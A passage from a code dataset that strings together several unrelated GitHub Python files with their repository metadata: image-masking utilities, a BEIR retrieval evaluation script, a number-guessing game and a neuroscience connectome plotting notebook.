(np.random.rand(h,w)) > missing_rate\n observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1))\n observed_mask_point = observed_mask[:,0].reshape(observed_mask.shape[0],-1) #bs,h*w\n\n\n elif len(x.shape) == 5: #chairs\n observed_mask, observed_mask_point = create_fixed_mask_missingness(x.shape) \n # bs, ch, h, w, d = x.shape\n # observed_mask_0 = (np.random.rand(h,w,d)) > missing_rate\n # observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1,1))\n # observed_mask_point= None\n \n else:\n raise NotImplementedError\n \n # observed_mask_0 = (np.random.rand(h,w)) > missing_rate\n # #TODO change this it fill fail, maybe we can use cfg to get the right dims\n # observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1))\n \n return x, observed_mask, observed_mask_point\n\ndef mask_to_input(self, input:torch.Tensor, mask:torch.Tensor)-> torch.Tensor:\n '''\n Args:\n input (torch.Tensor): Shape (batch_size, num_points, coordinate_dim or channel_dim).\n coor_mask (torch.Tensor): Shape (batch_size, num_points).\n Returns:\n missing_input (torch.Tensor): Shape (batch_size, num_points_not_masked,coordinate_dim or channel_dim)\n '''\n missing_input = input[mask,:].reshape(input.shape[0],-1,input.shape[2])\n return missing_input\n\n\ndef compute_occlusion_mask(input_size, occlusion_type: str, occlusion_size: int):\n \"\"\"\n Args:\n input_size (tuple): Size of the input image, WxH.\n occlusion_for_task (str): Type of task for getting occlusion\n occlusion_size (tuple): Starting index, Size of the occlusion.\n Returns:\n mask (torch.Tensor): Mask of shape (*input_size).\n \"\"\"\n\n\n # w,h = input_size\n if occlusion_type is None:\n occlusion_mask = torch.ones(*input_size,dtype=bool) #bogus\n return occlusion_mask\n\n index, size = occlusion_size\n number_of_axis = len(input_size)\n\n #occlusion mask is 1s everywhere, 0 at occluded place\n\n if number_of_axis==2:\n if occlusion_type == \"inpainting\":\n occlusion_mask = torch.ones(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size] = False\n\n elif occlusion_type == \"outpainting\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size] = True\n\n elif occlusion_type == \"half\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[:,:input_size[-1]//2] = True\n \n elif number_of_axis==3:\n if occlusion_type == \"inpainting\":\n occlusion_mask = torch.ones(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size,index:index+size] = False\n\n elif occlusion_type == \"outpainting\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size,index:index+size] = True\n\n elif occlusion_type == \"half\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[:,:,:input_size[-1]//2] = True\n \n else:\n raise NotImplementedError\n\n return occlusion_mask\n\ndef apply_occlusion_mask(coordinates:torch.Tensor, features:torch.Tensor, mask: torch.Tensor):\n '''\n Args:\n coordinates (torch.Tensor): Shape (batch_size, num_points, coordinate_dim)\n features (torch.Tensor): Shape (batch_size, num_points, channel_dim)\n mask (torch.Tensor): Shape (*dim).\n Returns:\n coordinates (torch.Tensor): Shape (batch_size, num_points_not_masked, coordinate_dim).\n features (torch.Tensor): Shape (batch_size, num_points_not_masked, channel_dim).\n '''\n \n coors_masked = coordinates[:, mask.flatten(), :] # [bs, num_points_not_masked, 
coordinate_dim]\n features_masked = features[:, mask.flatten(), :] # [bs, num_points_not_masked, channel_dim]\n\n return coors_masked, features_masked\n\n#NOT USED\ndef compute_mask_mar(batch, is_training):\n assert cfg.dataset.missing_perc>0\n bs = batch.shape[0]\n if is_training:\n if cfg.dataset.name in [\"shapenet\"]:\n mask = batch[0,:,[0]].expand(bs,-1,-1) #torch.Size([8, 6000, 1])\n mask_point = mask[:,:,0].reshape(mask.shape[0],-1) #bs,h*w\n elif cfg.dataset.name in [\"voxels\"]:\n mask = batch[0].expand(bs,-1,-1,-1,-1) #[bs,1,32,32,32]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n mask = batch[0].expand(bs,-1,-1,-1) #[bs,ch,h,w]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n if cfg.dataset.name in [\"shapenet\"]:\n mask = torch.ones_like(batch[0,:,[0]].expand(bs,-1,-1))\n mask_point = mask[:,:,0].reshape(mask.shape[0],-1) #bs,h*w\n elif cfg.dataset.name in [\"voxels\"]:\n mask = torch.ones_like(batch[0].expand(bs,-1,-1,-1,-1))#torch.Size([4, 1, 4096])\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n mask = torch.ones_like(batch[0]).expand(bs,-1,-1,-1) #[bs,ch,h,w]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n return mask, mask_point\n\n\ndef bbox2mask(self, bbox):\n \"\"\"Generate mask tensor from bbox.\n Args:\n bbox: configuration tuple, (top, left, height, width)\n config: Config should have configuration including IMG_SHAPES,\n MAX_DELTA_HEIGHT, MAX_DELTA_WIDTH.\n Returns:\n tf.Tensor: output with shape [B, 1, H, W]\n \"\"\"\n def npmask(bbox, ch, height, width, delta_h, delta_w):\n mask = np.zeros((1, ch, height, width), np.float32)\n # h = np.random.randint(delta_h//2+1)\n # w = np.random.randint(delta_w//2+1)\n h=delta_h\n w=delta_w\n mask[:, :, bbox[0] : bbox[0]+bbox[2],\n bbox[1] : bbox[1]+bbox[3]] = 1.\n return mask\n\n img_shape =cfg.dataset.dims\n height = img_shape[1]\n width = img_shape[2]\n\n mask = npmask(bbox, 1, height, width, 5, 5)\n \n return torch.FloatTensor(mask)\n \ndef compute_neighbors(bs,K,res,pi):\n #res is the bigger one\n #res_org = (res+1)//2\n # bs = x_rec.shape[0]\n # K = x_rec.shape[-1]\n # res = x_rec.shape[-2]\n pi = pi.permute(0,2,1).reshape(bs,K,res,res)\n conv2d = torch.nn.Conv2d(in_channels=K, out_channels=K, kernel_size=3, stride=2, bias=False,groups=K)\n weight = torch.zeros((K, 1, 3, 3),dtype=torch.float).to(cfg.device)\n # print(weight)\n weight[:,:,0,0]=1\n weight[:,:,0,-1]=1\n weight[:,:,-1,0]=1\n weight[:,:,-1,-1]=1\n # weight.requires_grad=False\n # print(weight)\n conv2d.weight = torch.nn.Parameter(weight)\n conv2d.weight.requires_grad=False\n a = conv2d(pi).detach()\n centers = np.arange(1,res,2)\n pi2 = impute_findings(a,pi,centers)\n\n conv2d2 = torch.nn.Conv2d(in_channels=K, out_channels=K, kernel_size=3, stride=1, bias=False, groups=K, padding=1)\n weight = torch.zeros((K, 1, 3, 3),dtype=torch.float).to(cfg.device)\n # print(weight)\n weight[:,:,0,1]=1\n weight[:,:,1,0]=1\n weight[:,:,1,-1]=1\n weight[:,:,-1,1]=1\n # weight.requires_grad=False\n # print(weight)\n conv2d2.weight = torch.nn.Parameter(weight)\n conv2d2.weight.requires_grad=False\n b = conv2d2(pi2).detach()\n centers = np.arange(1,res,2)\n # print(centers)\n centers2 = np.arange(0,res,2)\n # print(centers2)\n pi3 = impute_findings2(b,pi2,centers,centers2)\n return pi3\n\n\ndef impute_findings(source,target,centers):\n for x in centers:\n for y in centers:\n # print(x,y)\n # print((x-1)//2,(y-1)//2)\n target[:,:,x,y] = source[:,:,(x-1)//2,(y-1)//2]/4\n return target\n\ndef 
impute_findings2(source,target,centers,centers2):\n for x in centers:\n for y in centers2:\n # print(x,y)\n if y==0 or y==centers2[-1]:\n dividend = 3\n else:\n dividend = 4 \n target[:,:,x,y] = source[:,:,x,y]/dividend\n target[:,:,y,x] = source[:,:,y,x]/dividend\n return target\n\ndef neighborhood_filling(centers, prior_imputed_1:torch.Tensor, scale_pixels:int, kernel_size:int=3):\n #prior_imputed_1: (bs,all,K)\n #prior_imputed_1 = reshape\n kernel = np.zeros((scale_pixels+1,scale_pixels+1))\n kernel[0,0]=1\n kernel[0,-1]=1\n kernel[-1,0]=1\n kernel[-1,-1]=1\n kernel = np.asarray(kernel,dtype=bool)\n\n for x in centers-1:\n for y in centers-1:\n image = prior_imputed_1[:,x-scale_pixels//2:x+scale_pixels//2+1,y-scale_pixels//2:y+scale_pixels//2+1]\n result = image[:,kernel]\n values, counts = np.unique(result, return_counts=True)\n ind = np.argmax(counts)\n prior_imputed_1[x,y] = values[ind]\n\n return prior_imputed_1\n\ndef neighborhood_filling_2(centers, prior_imputed_1:torch.Tensor, scale_pixels:int, kernel_size:int=3):\n kernel = np.zeros((scale_pixels+1,scale_pixels+1))\n kernel[0,0]=1\n kernel[0,-1]=1\n kernel[-1,0]=1\n kernel[-1,-1]=1\n kernel = np.asarray(kernel,dtype=bool)\n \n for x in centers-1:\n for y in centers-1:\n image = prior_imputed_1[x-scale_pixels//2:x+scale_pixels//2+1,y-scale_pixels//2:y+scale_pixels//2+1]\n result = image[kernel]\n values, counts = np.unique(result, return_counts=True)\n ind = np.argmax(counts)\n prior_imputed_1[x,y] = values[ind]\n\n return prior_imputed_1", "repo_name": "bkoyuncu/vamoh", "sub_path": "imagegym/utils/mask.py", "file_name": "mask.py", "file_ext": "py", "file_size_in_byte": 12636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.randperm", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 145, "usage_type": "call"}, 
{"api_name": "torch.Tensor", "line_number": 153, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 171, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 171, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 174, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 174, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 177, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 177, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 184, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 185, "usage_type": "call"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 187, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 187, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 206, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 215, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 215, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 230, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 231, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.device", "line_number": 231, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 231, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 246, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.device", "line_number": 246, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 254, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 285, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 300, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 305, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.asarray", 
"line_number": 311, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 318, "usage_type": "call"}]} +{"seq_id": "16945607900", "text": "from beir import util, LoggingHandler\nfrom beir.datasets.data_loader import GenericDataLoader\nfrom beir.retrieval.evaluation import EvaluateRetrieval\n\nimport pathlib, os, csv, random\nimport sys\nimport argparse\nimport logging\n \n#### Just some code to print debug information to stdout\nlogging.basicConfig(format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO,\n handlers=[LoggingHandler()])\n\ncsv.field_size_limit(sys.maxsize)\n\ndef tsv_reader(input_filepath):\n reader = csv.reader(open(input_filepath, encoding=\"utf-8\"), delimiter=\"\\t\", quoting=csv.QUOTE_MINIMAL)\n for idx, row in enumerate(reader):\n yield idx, row\n\ndef main(dataset, split, data_dir, collection, rankings, k_values):\n #### Provide the data_dir where nfcorpus has been downloaded and unzipped\n if data_dir == None:\n url = \"https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip\".format(dataset)\n out_dir = os.path.join(pathlib.Path(__file__).parent.absolute(), \"datasets\")\n data_dir = util.download_and_unzip(url, out_dir)\n\n #### Provide the data_dir where nfcorpus has been downloaded and unzipped\n corpus, queries, qrels = GenericDataLoader(data_folder=data_dir).load(split=split)\n\n inv_map, results = {}, {}\n \n #### Document mappings (from original string to position in tsv file ####\n for idx, row in tsv_reader(collection):\n inv_map[str(idx)] = row[0]\n\n #### Results ####\n for _, row in tsv_reader(rankings):\n qid, doc_id, rank = row[0], row[1], int(row[2])\n if qid != inv_map[str(doc_id)]:\n if qid not in results:\n results[qid] = {inv_map[str(doc_id)]: 1 / (rank + 1)}\n else:\n results[qid][inv_map[str(doc_id)]] = 1 / (rank + 1)\n\n #### Evaluate your retrieval using NDCG@k, MAP@K ...\n evaluator = EvaluateRetrieval()\n ndcg, _map, recall, precision = evaluator.evaluate(qrels, results, k_values)\n mrr = EvaluateRetrieval.evaluate_custom(qrels, results, k_values, metric='mrr')\n\n #### Print top-k documents retrieved ####\n top_k = 10\n\n query_id, ranking_scores = random.choice(list(results.items()))\n scores_sorted = sorted(ranking_scores.items(), key=lambda item: item[1], reverse=True)\n logging.info(\"Query : %s\\n\" % queries[query_id])\n\n # for rank in range(top_k):\n # doc_id = scores_sorted[rank][0]\n # # Format: Rank x: ID [Title] Body\n # logging.info(\"Rank %d: %s [%s] - %s\\n\" % (rank+1, doc_id, corpus[doc_id].get(\"title\"), corpus[doc_id].get(\"text\")))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', type=str, help=\"BEIR Dataset Name, eg. 
nfcorpus\")\n parser.add_argument('--split', type=str, default=\"test\")\n parser.add_argument('--data_dir', type=str, default=None, help='Path to a BEIR repository (incase already downloaded or custom)')\n parser.add_argument('--collection', type=str, help='Path to the ColBERT collection file')\n parser.add_argument('--rankings', required=True, type=str, help='Path to the ColBERT generated rankings file')\n parser.add_argument('--k_values', nargs='+', type=int, default=[1,3,5,10,100])\n args = parser.parse_args()\n main(**vars(args))\n\n", "repo_name": "THUDM/P-tuning-v2", "sub_path": "PT-Retrieval/colbert/colbert/beir_eval.py", "file_name": "beir_eval.py", "file_ext": "py", "file_size_in_byte": 3323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1727, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 13, "usage_type": "attribute"}, {"api_name": "beir.LoggingHandler", "line_number": 14, "usage_type": "call"}, {"api_name": "csv.field_size_limit", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 16, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 19, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 27, "usage_type": "call"}, {"api_name": "beir.util.download_and_unzip", "line_number": 28, "usage_type": "call"}, {"api_name": "beir.util", "line_number": 28, "usage_type": "name"}, {"api_name": "beir.datasets.data_loader.GenericDataLoader", "line_number": 31, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval", "line_number": 49, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval.evaluate_custom", "line_number": 51, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval", "line_number": 51, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 56, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "43094156361", "text": "\n'''Guess Number\nhttps://www.reddit.com/r/dailyprogrammer/comments/pii6j/difficult_challenge_1/\n'''\n\n\nimport string\nfrom random import randint\n# Data modeling\nfrom dataclasses import dataclass, field, asdict\nfrom json import dumps as json_dumps\n# Type hints\nfrom typing import List\nfrom numbers import Integral\n\n\n@dataclass\nclass Model:\n '''Class for guess a random number\n '''\n guesses: List = field(default_factory=lambda: [])\n number: int = randint(0, 100)\n guess_range: List[int] = field(default_factory=lambda: [0, 100])\n \n \n def __post_init__(self):\n '''Execute after class initializes\n '''\n while True:\n #print(self)\n # Get user input\n input_message = f'Guess a number between {self.guess_range[0]} and {self.guess_range[1]}: '\n user_input = input(input_message)\n \n # Check if input is a number\n number_check = True\n try:\n user_input = int(user_input)\n self.guesses.append(user_input)\n except:\n number_check = False\n print(f'\"{user_input}\" is not a number. 
Please try again.')\n \n # Check if the guess is correct\n if number_check:\n if user_input > self.number:\n self.guess_range[1] = user_input\n print(f'The number is less than \"{user_input}\"')\n elif user_input < self.number:\n self.guess_range[0] = user_input\n print(f'The number is greater than \"{user_input}\"')\n elif user_input == self.number:\n print(f'Good guess! \"{self.number}\" is the correct number.') \n break\n \n \nif __name__ == '__main__':\n M = Model()\n print(json_dumps(asdict(M), indent=2))\n", "repo_name": "fjemi/coding_challenges", "sub_path": "challenges/guess_number.py", "file_name": "guess_number.py", "file_ext": "py", "file_size_in_byte": 1646, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 23, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 17, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 59, "usage_type": "call"}, {"api_name": "dataclasses.asdict", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "3300970328", "text": "# %% [markdown]\n# ##\nimport os\nimport time\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib.patches import Circle\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom scipy.integrate import tplquad\nfrom scipy.special import comb\nfrom scipy.stats import gaussian_kde\nfrom sklearn.metrics import pairwise_distances\n\nimport pymaid\nfrom graspy.utils import pass_to_ranks\nfrom hyppo.ksample import KSample\nfrom src.data import load_metagraph\nfrom src.graph import MetaGraph, preprocess\nfrom src.hierarchy import signal_flow\nfrom src.io import readcsv, savecsv, savefig\nfrom src.visualization import (\n CLASS_COLOR_DICT,\n adjplot,\n barplot_text,\n get_mid_map,\n gridmap,\n matrixplot,\n remove_axis,\n remove_spines,\n set_axes_equal,\n stacked_barplot,\n set_theme,\n)\n\n\n# plotting settings\nrc_dict = {\n \"axes.spines.right\": False,\n \"axes.spines.top\": False,\n \"axes.formatter.limits\": (-3, 3),\n \"figure.figsize\": (6, 3),\n \"figure.dpi\": 100,\n # \"axes.edgecolor\": \"lightgrey\",\n # \"ytick.color\": \"grey\",\n # \"xtick.color\": \"grey\",\n # \"axes.labelcolor\": \"dimgrey\",\n # \"text.color\": \"dimgrey\",\n \"pdf.fonttype\": 42,\n \"ps.fonttype\": 42,\n \"font.family\": \"sans-serif\",\n \"font.sans-serif\": [\"Arial\"],\n}\n\nset_theme(rc_dict=rc_dict, font_scale=1.25)\n\n\nnp.random.seed(8888)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, format=\"png\", dpi=200, **kws)\n savefig(name, foldername=FNAME, save_on=True, format=\"pdf\", dpi=200, **kws)\n\n\ndef stashcsv(df, name, **kws):\n savecsv(df, name, foldername=FNAME, **kws)\n\n\n# load data\nmg = load_metagraph(\"G\")\n# mg = mg.reindex(mg.meta[~mg.meta[\"super\"]].index, use_ids=True)\n\n\ngraph_types = [\"Gad\", \"Gaa\", \"Gdd\", \"Gda\"] # \"Gs\"]\nadjs = []\nfor g in graph_types:\n temp_mg = load_metagraph(g)\n # this line is important, to make the graphs aligned\n 
temp_mg.reindex(mg.meta.index, use_ids=True)\n temp_adj = temp_mg.adj\n adjs.append(temp_adj)\n\n\n# %%\n\nfig, ax = plt.subplots(2, 2, figsize=(20, 20))\n\n\n# %% [markdown]\n# ##\n\n# %% [markdown]\n# ## Load the 4-color graphs\n\ngraph_types = [\"Gad\", \"Gaa\", \"Gdd\", \"Gda\"]\nadjs = []\nfor g in graph_types:\n temp_mg = load_metagraph(g)\n temp_mg.reindex(mg.meta.index, use_ids=True)\n temp_adj = temp_mg.adj\n adjs.append(temp_adj)\n\n# %% [markdown]\n# ## Combine them into the 2N graph...\nn_verts = len(adjs[0])\naxon_inds = np.arange(n_verts)\ndend_inds = axon_inds.copy() + n_verts\ndouble_adj = np.empty((2 * n_verts, 2 * n_verts))\ndouble_adj[np.ix_(axon_inds, axon_inds)] = adjs[1] # Gaa\ndouble_adj[np.ix_(axon_inds, dend_inds)] = adjs[0] # Gad\ndouble_adj[np.ix_(dend_inds, axon_inds)] = adjs[3] # Gda\ndouble_adj[np.ix_(dend_inds, dend_inds)] = adjs[2] # Gdd\n# double_adj[axon_inds, dend_inds] = 1000 # make internal edges, make em big\n# double_adj[dend_inds, axon_inds] = 1000\n\naxon_meta = mg.meta.rename(index=lambda x: str(x) + \"_axon\")\naxon_meta[\"compartment\"] = \"Axon\"\ndend_meta = mg.meta.rename(index=lambda x: str(x) + \"_dend\")\ndend_meta[\"compartment\"] = \"Dendrite\"\n\n\ndouble_meta = pd.concat((axon_meta, dend_meta), axis=0)\n\nfig, ax = plt.subplots(1, 1, figsize=(20, 20))\nadjplot(\n double_adj,\n plot_type=\"scattermap\",\n sizes=(1, 1),\n ax=ax,\n meta=double_meta,\n sort_class=[\"compartment\"],\n item_order=[\"merge_class\", \"pair_id\"],\n colors=[\"merge_class\"],\n palette=CLASS_COLOR_DICT,\n)\nstashfig(\"double-adj\")\n\n\n#%%\nfig, axs = plt.subplots(2, 2, figsize=(20, 20), gridspec_kw=dict(hspace=0, wspace=0))\nmatrixplot_kws = dict(\n row_meta=mg.meta,\n col_meta=mg.meta,\n row_item_order=[\n \"merge_class\",\n \"pair_id\",\n ], # TODO maybe pick whatever we do in next figure\n col_item_order=[\"merge_class\", \"pair_id\"],\n # colors=[\"merge_class\"],\n palette=CLASS_COLOR_DICT,\n sizes=(1, 1),\n plot_type=\"scattermap\",\n)\n\nedge_type_palette = dict(zip(graph_types, sns.color_palette(\"deep\")))\n\nax = axs[0, 0]\nmatrixplot(adjs[1], ax=ax, color=edge_type_palette[\"Gaa\"], **matrixplot_kws)\nax.set(ylabel=\"Axon\", title=\"Axon\")\n\nax = axs[0, 1]\nmatrixplot(adjs[0], ax=ax, color=edge_type_palette[\"Gad\"], **matrixplot_kws)\nax.set(title=\"Dendrite\")\n\nax = axs[1, 0]\nmatrixplot(adjs[3], ax=ax, color=edge_type_palette[\"Gda\"], **matrixplot_kws)\nax.set(ylabel=\"Dendrite\")\n\nax = axs[1, 1]\nmatrixplot(adjs[2], ax=ax, color=edge_type_palette[\"Gdd\"], **matrixplot_kws)\nstashfig(\"4-color-adjplot\")", "repo_name": "neurodata/maggot_models", "sub_path": "notebooks/172.0-BDP-plot-4-color.py", "file_name": "172.0-BDP-plot-4-color.py", "file_ext": "py", "file_size_in_byte": 4615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "src.visualization.set_theme", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "src.io.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "src.io.savefig", "line_number": 70, "usage_type": "call"}, {"api_name": "src.io.savecsv", "line_number": 74, "usage_type": "call"}, {"api_name": "src.data.load_metagraph", 
"line_number": 78, "usage_type": "call"}, {"api_name": "src.data.load_metagraph", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "src.data.load_metagraph", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "src.visualization.adjplot", "line_number": 133, "usage_type": "call"}, {"api_name": "src.visualization.CLASS_COLOR_DICT", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "src.visualization.CLASS_COLOR_DICT", "line_number": 158, "usage_type": "name"}, {"api_name": "seaborn.color_palette", "line_number": 163, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 166, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 170, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 174, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 178, "usage_type": "call"}]} +{"seq_id": "31804258640", "text": "\"\"\"\nImplementation notes:\n • Since assignment guidelines did not specify the amount of max iterations, the default of 200 is given. MLP will therefore not converge\n • We use the training set to tune the hyperparameters, because the GridSearchCV library functions based on cross-validation. It can therefore\n only take in 1 dataset. 
